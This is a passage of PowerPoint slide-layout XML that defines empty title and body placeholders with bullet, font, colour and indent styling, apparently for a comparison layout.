            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485467" y="1484315"/>
            <a:ext cx="5082116" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-126959" lvl="3" marL="1600160" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="–"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-126949" lvl="4" marL="2057349" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-126937" lvl="5" marL="2514537" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-126925" lvl="6" marL="2971726" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-126913" lvl="7" marL="3428914" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-126903" lvl="8" marL="3886103" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>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比對">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="40" name="Shape 40"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1847527" y="274638"/>
            <a:ext cx="9734872" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1535112"/>
            <a:ext cx="5386917" cy="639762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2174875"/>
            <a:ext cx="5386917" cy="3951287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-190490" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-171431" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-126971" lvl="2" marL="1142971" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-139659" lvl="3" marL="1600160" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="–"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-139649" lvl="4" marL="2057349" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-139637" lvl="5" marL="2514537" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-139625" lvl="6" marL="2971726" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-139613" lvl="7" marL="3428914" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-139603" lvl="8" marL="3886103" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6193369" y="1535112"/>
            <a:ext cx="5389032" cy="639762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
